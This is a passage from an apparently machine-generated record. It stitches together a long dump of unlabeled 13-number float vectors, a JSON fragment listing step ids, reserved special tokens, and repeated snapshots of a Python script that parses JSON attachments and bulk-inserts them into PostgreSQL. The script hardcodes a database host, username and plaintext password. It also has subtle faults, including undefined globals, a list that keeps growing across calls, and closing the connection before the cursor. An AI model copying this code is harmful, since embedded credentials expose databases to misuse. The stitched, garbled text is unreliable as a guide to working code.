168925348515.4128]\n\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 191821821495.1242, 158798904598.69617]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, 163375067226.8736]\n\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, 152444791757.7255]\n\n[0.0, -1.223723210207519e-12, 
-2.1051647732787472e-13, 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15, 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06, -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, 153164597685.87036]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, 155849166742.8801]\n\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, 161472427331.15216]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, 175966043507.07343]\n\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15, 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06, -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, 184829802626.36642]\n\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, 189416231139.84406]\n\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, 4.9793760275117476e-11, -2.0772853669541976e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 
8.728626586100963e-10, 160631139543.06137, 122019730569.7476]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, 128597452665.91768]\n\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, 171303112707.4717]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 97245352689.07887, 174341101475.58182]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, 
-1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, 185221791801.95062]\n\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, 189416231139.85312]\n\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, 190153350507.14474]\n\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, 197738317572.1617]\n\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11, -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16, 2.0200374650352852e-05, -1.7758673160173464e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, 119035825863.27417]\n\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, 
120144468135.82727]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, 120359956158.03543]\n\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, 120995758664.39177]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 4.9967768219433575e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10, 151029089477.88403, 121221447183.73479]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, 129257349906.46594]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06, -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, 129372470770.49553]\n\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, 
1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n\n[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, 132029509845.4832]\n\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, 137741348069.72827]\n\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, 143862344272.2216]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, 151496866956.06183]\n\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, 154679332976.7693]\n\n[0.0, -1.2031098015567e-12, 
-2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, 4.9793760275117476e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 101036412554.48618, 178952195751.12357]\n\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10, 101115281125.52821, 181312381109.07834]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, 
-1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15, 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, 193403737351.61066]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06, -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, 199093039398.6542]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, 120593643708.66519]\n\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, 121269083493.68436]\n\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16, 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, 122027384226.92]\n\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, 
4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15, 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, 122750625888.09634]\n\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, 122935226427.98189]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, 131702579310.68652]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, 133211383937.09729]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, 143105235055.608]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, 
-1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, 143860615432.91934]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, 145092770865.8836]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, 155477031697.76462]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, 158587944243.89005]\n\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, 180430143233.58368]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15, 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, 183449646874.34637]\n\n[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, 
-1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, 191076754457.2524]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, 194275355409.06598]\n\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08, 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, 198112832281.90573]\n\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, 115813093887.0164]\n\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06, -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, 118508631814.89664]\n\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, 
119478476003.54858]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, 119746195767.88297]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, 120002114057.9749]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, 124495463707.0261]\n\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, 127226107362.62663]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, 128048566261.66084]\n\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.747166095423015e-10, 
-1.842789515995345e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, 129146670219.88675]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, 132556338910.10567]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, 132653030892.18918]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, 140436120253.29218]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, 143105235055.60883]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, 143860615432.91846]\n\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 
143868003797.30536]\n\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, 144269444777.14786]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, 145085114899.6645]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15, 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, 145085114900.12366]\n\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, 145590447784.79443]\n\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, 153694065180.84283]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, 154263245256.49524]\n\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.021867485100539e-11, 
-1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, 164710456294.5225]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, 170174200265.44513]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
